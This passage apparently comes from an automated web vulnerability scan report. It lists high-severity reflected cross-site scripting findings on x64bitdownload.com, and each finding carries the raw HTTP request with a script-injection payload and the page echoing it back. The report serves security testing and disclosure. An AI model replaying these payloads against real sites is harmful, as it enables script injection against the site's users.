This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-highspeed-connection-downloads.htmlf6e64"><script>alert(1)</script>c521abd2a7a HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:16 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22highspeed-connection%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22highspeed+connection%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-highspeed-connection-downloads.htmlf6e64"><script>alert(1)</script>c521abd2a7a" />
...[SNIP]...

4.1536. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-highspeed-connection-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79657"><script>alert(1)</script>383139ca774 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-highspeed-connection-downloads.html?79657"><script>alert(1)</script>383139ca774=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22highspeed-connection%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22highspeed+connection%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-highspeed-connection-downloads.html?79657"><script>alert(1)</script>383139ca774=1" />
...[SNIP]...

4.1537. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-image-grabber-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b7aa"><script>alert(1)</script>41d624163b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-image-grabber-downloads.html3b7aa"><script>alert(1)</script>41d624163b0 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22image-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22image+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-image-grabber-downloads.html3b7aa"><script>alert(1)</script>41d624163b0" />
...[SNIP]...

4.1538. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-image-grabber-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4aaf"><script>alert(1)</script>49c2f266fc0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-image-grabber-downloads.html?b4aaf"><script>alert(1)</script>49c2f266fc0=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22image-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22image+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-image-grabber-downloads.html?b4aaf"><script>alert(1)</script>49c2f266fc0=1" />
...[SNIP]...

4.1539. http://www.x64bitdownload.com/64-bit-images-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-images-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25a03"><script>alert(1)</script>f40fb3cd2d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-images-downloads.html25a03"><script>alert(1)</script>f40fb3cd2d3 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-images-downloads.html25a03"><script>alert(1)</script>f40fb3cd2d3" />
...[SNIP]...

4.1540. http://www.x64bitdownload.com/64-bit-images-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-images-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8785c"><script>alert(1)</script>d2427e65c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-images-downloads.html?8785c"><script>alert(1)</script>d2427e65c3=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-images-downloads.html?8785c"><script>alert(1)</script>d2427e65c3=1" />
...[SNIP]...

4.1541. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6ae4"><script>alert(1)</script>dfb91f562dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-internet-c-44-newsgroup-clients-downloads.htmla6ae4"><script>alert(1)</script>dfb91f562dc HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:32 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:41 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-internet-c-44-newsgroup-clients-downloads.htmla6ae4"><script>alert(1)</script>dfb91f562dc" />
...[SNIP]...

4.1542. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16d45"><script>alert(1)</script>8719bbde82f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-internet-c-44-newsgroup-clients-downloads.html?16d45"><script>alert(1)</script>8719bbde82f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:32 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-internet-c-44-newsgroup-clients-downloads.html?16d45"><script>alert(1)</script>8719bbde82f=1" />
...[SNIP]...

4.1543. http://www.x64bitdownload.com/64-bit-internet-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab88e"><script>alert(1)</script>e25a069793d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-internet-downloads.htmlab88e"><script>alert(1)</script>e25a069793d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:01:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-internet-downloads.htmlab88e"><script>alert(1)</script>e25a069793d" />
...[SNIP]...

4.1544. http://www.x64bitdownload.com/64-bit-internet-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c18b"><script>alert(1)</script>4608bc7414f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-internet-downloads.html?1c18b"><script>alert(1)</script>4608bc7414f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:58:13 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-internet-downloads.html?1c18b"><script>alert(1)</script>4608bc7414f=1" />
...[SNIP]...

4.1545. http://www.x64bitdownload.com/64-bit-kill-file-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-kill-file-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 955cd"><script>alert(1)</script>a4826d7de3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-kill-file-downloads.html?955cd"><script>alert(1)</script>a4826d7de3e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22kill-file%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22kill+file%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-kill-file-downloads.html?955cd"><script>alert(1)</script>a4826d7de3e=1" />
...[SNIP]...

4.1546. http://www.x64bitdownload.com/64-bit-killfile-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-killfile-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a32"><script>alert(1)</script>3d9f059b861 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-killfile-downloads.html?a2a32"><script>alert(1)</script>3d9f059b861=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:50 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-killfile-downloads.html?a2a32"><script>alert(1)</script>3d9f059b861=1" />
...[SNIP]...

4.1547. http://www.x64bitdownload.com/64-bit-mp3-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-mp3-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a24e"><script>alert(1)</script>93d52a361a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-mp3-downloads.html6a24e"><script>alert(1)</script>93d52a361a4 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 95008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-mp3-downloads.html6a24e"><script>alert(1)</script>93d52a361a4" />
...[SNIP]...

4.1548. http://www.x64bitdownload.com/64-bit-mp3-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-mp3-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1733"><script>alert(1)</script>a1ee4a1cc7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-mp3-downloads.html?d1733"><script>alert(1)</script>a1ee4a1cc7d=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:49 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 95011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-mp3-downloads.html?d1733"><script>alert(1)</script>a1ee4a1cc7d=1" />
...[SNIP]...

4.1549. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multimedia-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6969"><script>alert(1)</script>002478f819e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-multimedia-downloads.htmld6969"><script>alert(1)</script>002478f819e HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-multimedia-downloads.htmld6969"><script>alert(1)</script>002478f819e" />
...[SNIP]...

4.1550. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multimedia-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b14b"><script>alert(1)</script>9323ad41c03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-multimedia-downloads.html?4b14b"><script>alert(1)</script>9323ad41c03=1 HTTP/1.1
Host: www.x64bitdownload.com
